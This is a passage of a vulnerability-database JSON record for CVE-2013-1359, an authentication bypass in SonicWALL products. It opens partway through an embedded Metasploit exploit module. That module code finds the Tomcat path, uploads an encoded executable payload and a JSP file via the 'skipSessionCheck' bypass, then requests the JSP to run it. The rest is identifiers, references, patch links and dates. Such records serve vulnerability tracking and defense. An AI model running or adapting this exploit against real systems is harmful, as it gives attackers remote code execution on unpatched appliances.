=\u003e \u0027application_log\u0027,\n\t\t\t\t\t\u0027criteria\u0027 =\u003e \u0027*.*\u0027,\n\t\t\t\t\t\u0027width\u0027 =\u003e \u0027500\u0027\n\t\t\t\t}\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/\n\t\t\treturn $1\n\t\tend\n\n\t\treturn nil\n\tend\n\n\tdef upload_file(location, filename, contents)\n\t\tpost_data = Rex::MIME::Message.new\n\t\tpost_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\")\n\t\tpost_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\")\n\t\tpost_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\")\n\t\tpost_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; filename=\\\"#{filename}\\\"\")\n\n\t\tdata = post_data.to_s\n\t\tdata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\n\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027data\u0027 =\u003e data,\n\t\t\t\t\u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{post_data.bound}\",\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027TE\u0027 =\u003e \"deflate,gzip;q=0.3\",\n\t\t\t\t\t},\n\t\t\t\t\u0027connection\u0027 =\u003e \u0027TE, close\u0027\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body.empty?\n\t\t\treturn true\n\t\telse\n\t\t\treturn false\n\t\tend\n\tend\n\n\tdef check\n\t\t@peer = \"#{rhost}:#{rport}\"\n\t\t@uri = normalize_uri(target_uri.path)\n\t\t@uri \u003c\u003c \u0027/\u0027 if @uri[-1,1] != \u0027/\u0027\n\n\t\tif get_install_path.nil?\n\t\t\treturn Exploit::CheckCode::Safe\n\t\tend\n\n\t\treturn Exploit::CheckCode::Vulnerable\n\tend\n\n\tdef exploit\n\t\t@peer = \"#{rhost}:#{rport}\"\n\t\t@uri = normalize_uri(target_uri.path)\n\t\t@uri \u003c\u003c \u0027/\u0027 if @uri[-1,1] != \u0027/\u0027\n\n\t\t# Get Tomcat installation path\n\t\tprint_status(\"#{@peer} - Retrieving Tomcat installation path...\")\n\t\tinstall_path = get_install_path\n\n\t\tif install_path.nil?\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Unable to retrieve the Tomcat installation path\")\n\t\tend\n\n\t\tprint_good(\"#{@peer} - Tomcat installed on #{install_path}\")\n\n\t\tif target[\u0027Platform\u0027] == \"linux\"\n\t\t\t@location = \"#{install_path}webapps/appliance/\"\n\t\telsif target[\u0027Platform\u0027] == \"win\"\n\t\t\t@location = \"#{install_path}webapps\\\\appliance\\\\\"\n\t\tend\n\n\n\t\t# Upload the JSP and the raw payload\n\t\t@jsp_name = rand_text_alphanumeric(8+rand(8))\n\n\t\tjspraw = generate_jsp\n\n\t\t# Specify the payload in hex as an extra file.. \n\t\tpayload_hex = payload.encoded_exe.unpack(\u0027H*\u0027)[0]\n\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\n\n\t\tif upload_file(@location, \"#{@var_hexfile}.txt\", payload_hex)\n\t\t\tprint_good(\"#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt\")\n\t\telse\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the Payload\")\n\t\tend\n\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\n\n\t\tif upload_file(@location, \"#{@jsp_name}.jsp\", jspraw)\n\t\t\tprint_good(\"#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp\")\n\t\telse\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the jsp\")\n\t\tend\n\n\t\tprint_status(\"Triggering payload at \u0027#{@uri}#{@jsp_name}.jsp\u0027 ...\")\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/#{@jsp_name}.jsp\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027GET\u0027\n\t\t\t})\n\n\t\tif res and res.code != 200\n\t\t\tprint_warning(\"#{@peer} - Error triggering the payload\")\n\t\tend\n\n\t\tregister_files_for_cleanup(\"#{@location}#{@var_hexfile}.txt\")\n\t\tregister_files_for_cleanup(\"#{@location}#{@jsp_name}.jsp\")\n\tend\n\nend\n", "sources": [ { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "BID", "id": "57445" }, { "db": "VULHUB", "id": "VHN-61361" }, { "db": "PACKETSTORM", "id": "119808" } ], "trust": 2.07 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-61361", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-1359", "trust": 2.9 }, { "db": "BID", "id": "57445", "trust": 2.0 }, { "db": "SECTRACK", "id": "1028007", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "24204", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "24322", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2013-007224", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201301-377", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "119808", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-77937", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-78054", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-61361", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "BID", "id": "57445" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "PACKETSTORM", "id": "119808" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "id": "VAR-202002-0532", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-61361" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:49:50.845000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.sonicwall.com/" }, { "title": "Multiple SonicWALL Product verification bypass fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108920" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-287", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "NVD", "id": "CVE-2013-1359" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://seclists.org/fulldisclosure/2013/jan/125" }, { "trust": 1.7, "url": "http://www.exploit-db.com/exploits/24204" }, { "trust": 1.7, "url": "http://www.exploit-db.com/exploits/24322" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/57445" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1028007" }, { "trust": 1.7, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367" }, { "trust": 1.7, "url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns" }, { "trust": 1.7, "url": "https://packetstormsecurity.com/files/author/7547/" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1359" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1359" }, { "trust": 0.1, "url": "http://metasploit.com/" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "PACKETSTORM", "id": "119808" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "BID", "id": "57445" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "PACKETSTORM", "id": "119808" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-11T00:00:00", "db": "VULHUB", "id": "VHN-61361" }, { "date": "2013-01-17T00:00:00", "db": "BID", "id": "57445" }, { "date": "2020-03-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "date": "2013-01-25T02:58:51", "db": "PACKETSTORM", "id": "119808" }, { "date": "2020-02-11T17:15:11.593000", "db": "NVD", "id": "CVE-2013-1359" }, { "date": "2013-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-14T00:00:00", "db": "VULHUB", "id": "VHN-61361" }, { "date": "2013-01-24T19:00:00", "db": "BID", "id": "57445" }, { "date": "2020-03-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "date": "2020-02-14T18:13:49.477000", "db": "NVD", "id": "CVE-2013-1359" }, { "date": "2020-05-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-377" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural SonicWALL Product authentication vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007224" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-377" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.